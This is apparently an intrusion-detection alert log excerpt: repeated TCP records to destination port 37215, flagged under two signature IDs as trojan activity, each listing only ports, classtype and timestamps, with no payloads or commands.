          SID:2835222
          Source Port:51328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745378
          SID:2835222
          Source Port:44442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780605
          SID:2835222
          Source Port:50160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.800330
          SID:2835222
          Source Port:47860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742355
          SID:2829579
          Source Port:38430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018473
          SID:2835222
          Source Port:40290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241463
          SID:2835222
          Source Port:60102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510296
          SID:2829579
          Source Port:37744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272712
          SID:2835222
          Source Port:60870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746627
          SID:2829579
          Source Port:44232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734746
          SID:2835222
          Source Port:38424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671267
          SID:2835222
          Source Port:47202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604287
          SID:2835222
          Source Port:33830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406995
          SID:2829579
          Source Port:54992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911521
          SID:2835222
          Source Port:38192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151302
          SID:2829579
          Source Port:34482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509762
          SID:2835222
          Source Port:54682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444911
          SID:2835222
          Source Port:56728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741976
          SID:2835222
          Source Port:35068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810283
          SID:2829579
          Source Port:48664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744469
          SID:2829579
          Source Port:35534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897168
          SID:2829579
          Source Port:54454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402010
          SID:2835222
          Source Port:53834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512565
          SID:2835222
          Source Port:49788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108874
          SID:2835222
          Source Port:43524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514287
          SID:2835222
          Source Port:51138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795359
          SID:2835222
          Source Port:50692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731176
          SID:2829579
          Source Port:52714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729144
          SID:2835222
          Source Port:39062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179455
          SID:2835222
          Source Port:47554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742153
          SID:2829579
          Source Port:50208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817017
          SID:2829579
          Source Port:53556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542786
          SID:2835222
          Source Port:49026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258061
          SID:2829579
          Source Port:53476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403267
          SID:2835222
          Source Port:50016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554782
          SID:2829579
          Source Port:42576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516741
          SID:2829579
          Source Port:44242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037202
          SID:2829579
          Source Port:44026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175527
          SID:2829579
          Source Port:60992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514117
          SID:2829579
          Source Port:39462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467112
          SID:2829579
          Source Port:54834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604068
          SID:2835222
          Source Port:57808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516834
          SID:2835222
          Source Port:52354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516620
          SID:2829579
          Source Port:60366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841693
          SID:2835222
          Source Port:52012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516478
          SID:2835222
          Source Port:56540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461804
          SID:2835222
          Source Port:60200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036526
          SID:2835222
          Source Port:37356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783449
          SID:2835222
          Source Port:52336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827509
          SID:2835222
          Source Port:55518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039445
          SID:2829579
          Source Port:53340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108255
          SID:2835222
          Source Port:46216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672731
          SID:2829579
          Source Port:33508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748017
          SID:2835222
          Source Port:45302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261281
          SID:2829579
          Source Port:37636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780965
          SID:2829579
          Source Port:47228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511589
          SID:2835222
          Source Port:56578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517317
          SID:2835222
          Source Port:43000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860738
          SID:2835222
          Source Port:57982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067840
          SID:2829579
          Source Port:49586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787872
          SID:2835222
          Source Port:39154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356356
          SID:2829579
          Source Port:55832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797154
          SID:2829579
          Source Port:51014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786617
          SID:2829579
          Source Port:50122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471171
          SID:2829579
          Source Port:39302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160291
          SID:2835222
          Source Port:56212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353781
          SID:2829579
          Source Port:52668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154097
          SID:2835222
          Source Port:37890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241566
          SID:2829579
          Source Port:54382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240379
          SID:2835222
          Source Port:55492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162830
          SID:2829579
          Source Port:41516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160891
          SID:2835222
          Source Port:53080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747620
          SID:2835222
          Source Port:35082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.828031
          SID:2829579
          Source Port:48748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067916
          SID:2829579
          Source Port:33254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403165
          SID:2829579
          Source Port:56512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671769
          SID:2829579
          Source Port:38816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675140
          SID:2829579
          Source Port:33230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159399
          SID:2835222
          Source Port:50858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270838
          SID:2835222
          Source Port:39692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517569
          SID:2829579
          Source Port:49556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743562
          SID:2829579
          Source Port:47406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741790
          SID:2829579
          Source Port:57994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739344
          SID:2835222
          Source Port:45196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671729
          SID:2835222
          Source Port:50680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444604
          SID:2829579
          Source Port:40606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175813
          SID:2829579
          Source Port:51978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861851
          SID:2835222
          Source Port:47628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242171
          SID:2835222
          Source Port:58222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155996
          SID:2835222
          Source Port:51788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780452
          SID:2829579
          Source Port:53606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177889
          SID:2835222
          Source Port:35336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600869
          SID:2829579
          Source Port:54704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302530
          SID:2829579
          Source Port:39412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800597
          SID:2829579
          Source Port:44336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787678
          SID:2829579
          Source Port:41336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792819
          SID:2835222
          Source Port:53022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129405
          SID:2835222
          Source Port:48334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378567
          SID:2835222
          Source Port:36322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901518
          SID:2829579
          Source Port:48870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351099
          SID:2829579
          Source Port:57140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449653
          SID:2829579
          Source Port:51472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237533
          SID:2835222
          Source Port:38726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176249
          SID:2829579
          Source Port:37130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729243
          SID:2829579
          Source Port:34798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466387
          SID:2829579
          Source Port:36080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449273
          SID:2829579
          Source Port:39288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019266
          SID:2835222
          Source Port:50144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057899
          SID:2829579
          Source Port:50354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173346
          SID:2829579
          Source Port:43802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810249
          SID:2835222
          Source Port:38180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176113
          SID:2829579
          Source Port:42166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404487
          SID:2829579
          Source Port:46606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266209
          SID:2829579
          Source Port:44452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395952
          SID:2829579
          Source Port:48734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159876
          SID:2835222
          Source Port:58184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858201
          SID:2829579
          Source Port:49734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099448
          SID:2829579
          Source Port:54646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114118
          SID:2835222
          Source Port:33272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795386
          SID:2829579
          Source Port:39434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015015
          SID:2835222
          Source Port:57196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236889
          SID:2829579
          Source Port:33062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.824196
          SID:2835222
          Source Port:45366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729798
          SID:2835222
          Source Port:45270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707542
          SID:2829579
          Source Port:36496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602949
          SID:2835222
          Source Port:39160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729909
          SID:2829579
          Source Port:54880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810851
          SID:2829579
          Source Port:52802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673766
          SID:2835222
          Source Port:54106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441059
          SID:2829579
          Source Port:45468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407344
          SID:2829579
          Source Port:59064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819128
          SID:2829579
          Source Port:53478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354940
          SID:2829579
          Source Port:59962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019287
          SID:2829579
          Source Port:38682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233622
          SID:2829579
          Source Port:40046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114241
          SID:2829579
          Source Port:36764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126736
          SID:2835222
          Source Port:42214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786444
          SID:2829579
          Source Port:59638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517012
          SID:2835222
          Source Port:51142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152940
          SID:2835222
          Source Port:35096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158770
          SID:2835222
          Source Port:33544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782450
          SID:2835222
          Source Port:57968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853548
          SID:2835222
          Source Port:38850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742949
          SID:2829579
          Source Port:39344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114177
          SID:2829579
          Source Port:59928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.296778
          SID:2829579
          Source Port:49666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407150
          SID:2835222
          Source Port:45122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151028
          SID:2829579
          Source Port:53596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784508
          SID:2829579
          Source Port:59282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114045
          SID:2835222
          Source Port:41886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295726
          SID:2835222
          Source Port:42576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354745
          SID:2835222
          Source Port:45870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509079
          SID:2829579
          Source Port:38214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890939
          SID:2835222
          Source Port:36958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730832
          SID:2835222
          Source Port:33588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.062902
          SID:2835222
          Source Port:36726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273464
          SID:2835222
          Source Port:47894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731332
          SID:2835222
          Source Port:42700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781196
          SID:2835222
          Source Port:45326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461886
          SID:2829579
          Source Port:50112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515608
          SID:2829579
          Source Port:42948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469190
          SID:2835222
          Source Port:40326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467440
          SID:2829579
          Source Port:38152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805038
          SID:2835222
          Source Port:42390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805230
          SID:2829579
          Source Port:58022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509030
          SID:2835222
          Source Port:43764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513903
          SID:2835222
          Source Port:48992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787910
          SID:2829579
          Source Port:37180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236955
          SID:2829579
          Source Port:40604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709817
          SID:2835222
          Source Port:48650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270488
          SID:2829579
          Source Port:34074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896597
          SID:2829579
          Source Port:51160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239315
          SID:2829579
          Source Port:51820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742599
          SID:2835222
          Source Port:52608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708876
          SID:2835222
          Source Port:58820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600874
          SID:2829579
          Source Port:41794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126902
          SID:2835222
          Source Port:56200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808558
          SID:2829579
          Source Port:49364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107681
          SID:2835222
          Source Port:32814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239030
          SID:2829579
          Source Port:45900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353999
          SID:2829579
          Source Port:43840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741902
          SID:2835222
          Source Port:44534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408267
          SID:2835222
          Source Port:42714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884686
          SID:2829579
          Source Port:55394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262216
          SID:2835222
          Source Port:52320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449945
          SID:2829579
          Source Port:60276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555265
          SID:2829579
          Source Port:46076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783883
          SID:2835222
          Source Port:59256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463708
          SID:2835222
          Source Port:37242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811677
          SID:2835222
          Source Port:44812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512597
          SID:2829579
          Source Port:54188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.796356
          SID:2835222
          Source Port:40384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461820
          SID:2835222
          Source Port:50976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850497
          SID:2829579
          Source Port:57478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150691
          SID:2835222
          Source Port:46632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854206
          SID:2835222
          Source Port:53266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549724
          SID:2829579
          Source Port:49114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600172
          SID:2829579
          Source Port:33746
          Destination Port:37215
